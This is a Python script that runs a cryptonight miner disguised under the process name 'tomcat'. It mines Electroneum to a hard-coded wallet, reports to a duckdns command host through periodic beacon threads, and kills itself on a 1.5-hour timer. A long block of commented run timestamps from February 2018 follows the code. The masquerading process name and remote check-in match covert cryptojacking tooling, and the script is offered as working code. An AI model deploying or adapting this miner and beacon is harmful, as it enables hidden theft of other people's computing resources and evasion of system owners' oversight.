import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:04.713374
#2018-02-17 16:18:01.256655
#2018-02-17 18:05:06.577263
#2018-02-17 19:54:05.361540
#2018-02-17 21:44:05.163265
#2018-02-17 23:28:04.129217
#2018-02-18 01:17:05.973681
#2018-02-18 03:04:05.175075
#2018-02-18 04:51:06.766969
#2018-02-18 06:42:04.036941
#2018-02-18 08:31:05.272444
#2018-02-18 10:18:02.077263
#2018-02-18 12:04:06.806591
#2018-02-18 13:49:03.244944
#2018-02-18 15:40:07.032115
#2018-02-18 17:28:07.478833
#2018-02-18 19:16:03.747238
#2018-02-18 21:03:01.332978
#2018-02-18 22:48:07.184442
#2018-02-19 00:36:06.054182
#2018-02-19 02:22:06.006931
#2018-02-19 04:09:03.740258
#2018-02-19 05:53:07.046958
#2018-02-19 07:41:05.858600
#2018-02-19 09:31:01.627631
#2018-02-19 11:21:07.314982
#2018-02-19 13:09:04.967316
#2018-02-19 14:56:09.883380
#2018-02-19 16:44:04.256584
#2018-02-19 18:32:03.832461
#2018-02-19 20:19:08.911698
#2018-02-19 22:08:01.338342
#2018-02-19 23:53:08.191056
#2018-02-20 01:41:07.443568
#2018-02-20 03:29:05.614483
#2018-02-20 05:16:07.705099
#2018-02-20 06:58:07.776038
#2018-02-20 08:45:04.003763
#2018-02-20 10:29:08.746724
#2018-02-20 12:14:01.403409
#2018-02-20 14:02:02.117972
#2018-02-20 15:45:13.554334
#2018-02-20 17:29:08.872904
#2018-02-20 19:18:08.278031
#2018-02-20 21:08:04.502309
#2018-02-20 22:53:03.935092
#2018-02-21 00:35:08.024088
#2018-02-21 02:21:08.096463
#2018-02-21 04:07:05.045435
#2018-02-21 05:54:01.794859
#2018-02-21 07:42:06.861636
#2018-02-21 09:26:08.727543
#2018-02-21 11:15:05.504924
#2018-02-21 13:02:09.436458
#2018-02-21 14:49:07.051597
#2018-02-21 16:38:04.506348
#2018-02-21 18:28:01.360925
#2018-02-21 20:13:07.688406
#2018-02-21 22:03:07.311815
#2018-02-21 23:51:04.580645
#2018-02-22 01:42:04.955958
#2018-02-22 03:30:10.671958
#2018-02-22 05:17:01.879990
#2018-02-22 07:01:05.023330
#2018-02-22 08:48:02.090843
#2018-02-22 10:36:06.247769
#2018-02-22 12:21:12.582584
#2018-02-22 14:06:01.694209
#2018-02-22 15:52:10.537158
#2018-02-22 17:39:07.752879
#2018-02-22 19:25:09.253045
#2018-02-22 21:18:08.746287
#2018-02-22 23:04:01.400988
#2018-02-23 00:52:06.914478
#2018-02-23 02:40:08.367377
#2018-02-23 04:29:06.653919
#2018-02-23 06:16:04.810443
#2018-02-23 08:03:03.791223
#2018-02-23 10:18:04.535657
#2018-02-23 12:08:06.261227
#2018-02-23 13:56:05.139111
#2018-02-23 15:49:10.584281
#2018-02-23 17:36:02.114978
#2018-02-23 19:22:04.871576
#2018-02-23 21:06:07.238931
#2018-02-23 22:52:01.272937
#2018-02-24 00:40:09.262034
#2018-02-24 02:31:06.567604
#2018-02-24 04:24:07.324996
#2018-02-24 06:10:07.605670
#2018-02-24 07:57:05.474016
#2018-02-24 09:42:03.703095
#2018-02-24 11:37:05.347051
#2018-02-24 13:27:06.122242
#2018-02-24 15:16:07.251267
#2018-02-24 17:07:04.069980
#2018-02-24 18:58:04.761446
#2018-02-24 20:45:08.591264
#2018-02-24 23:01:01.359159
#2018-02-25 02:18:03.841831
#2018-02-25 05:41:01.538948
#2018-02-25 11:36:05.845008